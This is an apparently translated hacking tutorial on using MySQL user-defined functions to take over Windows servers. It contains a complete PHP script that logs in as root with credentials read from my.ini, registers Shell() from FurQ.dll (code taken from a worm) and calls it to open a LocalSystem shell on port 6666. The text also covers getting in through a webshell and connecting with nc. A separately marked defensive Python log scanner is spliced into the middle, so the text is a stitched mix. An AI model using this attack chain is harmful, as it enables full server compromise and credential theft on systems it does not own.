Not long ago, a "MySQL Func" vulnerability was published on the Internet. It concerns using MySQL to create a user-defined function and then using that function to attack the server. We first saw the related reports on K-OTik, but the exploit published there was for Unix systems, and its success rate was not very high. Recently some experts in China published articles about the Windows side, so I looked into it together with my friends.
  
In fact, we have long known that when attacking an MSSQL or Oracle database, once we obtain the account with the highest privileges in the database, we often launch the attack by executing a special extended stored procedure or function. For example, MSSQL has xp_cmdshell, and in Oracle one can use Msvcrt.dll to create a special function. However, we never considered that MySQL, one of the most popular database packages, can also be used to create functions. Seen from this angle, this MySQL "vulnerability" should not be called a vulnerability at all, but a technique.
  
After all that preamble, let's look at how to create a function in MySQL. This is far more important than how to use it: once you understand the principle, you can apply it more flexibly and combine it with other ideas.
  
The statement for creating a function in MySQL is:
  
CREATE FUNCTION FunctionName RETURNS [STRING | INTEGER | REAL] SONAME 'C:\function.dll';
  
FunctionName is the name of the function, C:\function.dll is the DLL that the function is loaded from, and the function name must also be the name of the exported function inside the DLL. Note that if we want MySQL to pass parameters to the function, the function must follow the UDF programming rules; for details see section 14, "Adding New Functions to MySQL", in the MySQL manual. STRING, INTEGER and REAL are the types of the value returned after the function executes. Of course, we do not have to follow the UDF conventions at all: if the function body simply contains the code we want to run, without using any parameters, the attack still works, for example System("command.com") and so on. The FurQ worm that is currently spreading through this vulnerability on the Internet is an example of not using the UDF format. Note, however, that the CREATE FUNCTION statement requires the MySQL account we use to have write permission on the mysql database; otherwise it cannot be used.
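On the defensive side, the statement just described is easy to recognise in a MySQL general query log. The script below is an added example, not part of the original article: it parses constructed general-log lines in the classic timestamp / thread id / command layout, flags every CREATE FUNCTION ... SONAME load, rates a library given with a drive or directory component as high severity (modern MySQL only loads UDF libraries from its plugin directory, so a path into a web root is the pattern this page shows), and then flags later calls to any function loaded that way. The log lines, thread ids and the udf_example.so entry are all constructed for the example.

```python
import re

# Constructed MySQL general-query-log lines (not from the original page); the
# UDF name and DLL path mirror the walkthrough on this page, the rest is filler.
SAMPLE_LOG = [
    r"050301 10:02:11       7 Connect  root@localhost on mysql",
    r"050301 10:02:12       7 Query    CREATE FUNCTION Shell RETURNS INTEGER SONAME 'd:\wwwroot\FurQ.dll'",
    r"050301 10:02:13       7 Query    SELECT Shell()",
    r"050301 10:05:40       9 Query    SELECT COUNT(*) FROM users WHERE id = 3",
    r"050301 10:06:02      11 Query    CREATE FUNCTION metaphon RETURNS STRING SONAME 'udf_example.so'",
]

# Classic general log layout: optional "YYMMDD HH:MM:SS", thread id, command, argument.
LOG_LINE_RE = re.compile(
    r"^(?:\d{6}\s+\d{1,2}:\d\d:\d\d)?\s*(?P<thread>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$"
)
# The CREATE FUNCTION ... SONAME form this page describes; AGGREGATE is optional.
UDF_CREATE_RE = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(?P<name>\w+)\s+RETURNS\s+"
    r"(?:STRING|INTEGER|INT|REAL|DECIMAL)\s+SONAME\s+['\"](?P<lib>[^'\"]+)['\"]",
    re.IGNORECASE,
)


def scan_general_log(lines):
    """Return findings for UDF loads and for calls to any UDF loaded earlier in the log."""
    findings, loaded = [], set()  # loaded: lower-cased names of UDFs seen being created
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        thread, stmt = int(m.group("thread")), m.group("arg")
        c = UDF_CREATE_RE.search(stmt)
        if c:
            name, lib = c.group("name"), c.group("lib")
            # A drive letter or directory separator means the library is being loaded
            # from outside the server's plugin directory, e.g. from a web root.
            outside_plugin_dir = any(sep in lib for sep in ("/", "\\", ":"))
            findings.append({"thread": thread, "rule": "udf_create", "function": name,
                             "library": lib, "severity": "high" if outside_plugin_dir else "medium"})
            loaded.add(name.lower())
            continue
        for name in loaded:  # any later call to a freshly loaded UDF, on any connection
            if re.search(rf"\b{re.escape(name)}\s*\(", stmt, re.IGNORECASE):
                findings.append({"thread": thread, "rule": "udf_call",
                                 "function": name, "severity": "high"})
    return findings


if __name__ == "__main__":
    for finding in scan_general_log(SAMPLE_LOG):
        print(finding)
```

Feeding real log lines through scan_general_log() instead of SAMPLE_LOG gives the same per-statement findings; correlating on the thread id shows which connection both loaded and called the function.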
  
Okay. Now that we understand the principle, let's look at how to use MySQL to escalate privileges.
  
Suppose we have already obtained a WebShell on the server through some other vulnerability. Here we demonstrate with angel's phpspy, because PHP can connect to MySQL by default, whereas ASP needs additional components to connect.
  
In general, on Windows, much software creates a file named my.ini that contains sensitive MySQL information. If the host we have compromised does not have good permission settings and we are allowed to browse the %windir% directory, we can easily read it. In addition, many administrators write the root account and password into this my.ini, so once we have read the root password we can control the entire MySQL database, or even the server (see figure 1).
  
After obtaining the MySQL root password, we need to upload our DLL. Here I use FurQ.dll, extracted from the FurQ worm. Executing the Shell function in this DLL makes the system open a password-protected shell on port 6666; the password is of course "FurQ". However, we still have no way to execute it: we first have to use MySQL to create this function inside MySQL.
  
Now we use phpspy to create a PHP file with the following content:
  
<?php
$link = mysql_connect("127.0.0.1", "root", "root");
if (!$link) {
    die("Could Not Connect The Database! : " . mysql_error());
}
echo "Good Boy. Connected!\n";
// Here root/root are the user and password read from my.ini.

@mysql_select_db("mysql") or die("use database mysql failed!");
echo "Yes You Did!\n";
// Here we select the mysql database. Of course, you could also choose another one, such as test.

$query = "Create Function Shell returns integer soname 'd:\\wwwroot\\FurQ.dll';";
@$result = mysql_query($query, $link) or die("Create Function Failed!");
echo "Goddess... Succeeded!\n";
// These two statements are the key: the CREATE FUNCTION statement registers the Shell
// function from d:\wwwroot\FurQ.dll in MySQL so that MySQL can execute it.

$query = "Select Shell();";
@$result = mysql_query($query, $link) or die("Execute failed");
echo "Congratulations! Connect The Port 6666 Of This Server VS password: FurQ\n";
// Executing the Shell function opens port 6666 on the server.
?>
  
Run it, and everything returns normally (see figure 2). Now we can use nc to connect to port 6666 of the server and enter the password FurQ, and a shell is returned. Of course, because it inherits MySQL's privileges, and on Windows MySQL is installed as a service by default, the shell we get runs as LocalSystem, and we can do whatever we want. But don't do anything bad, haha.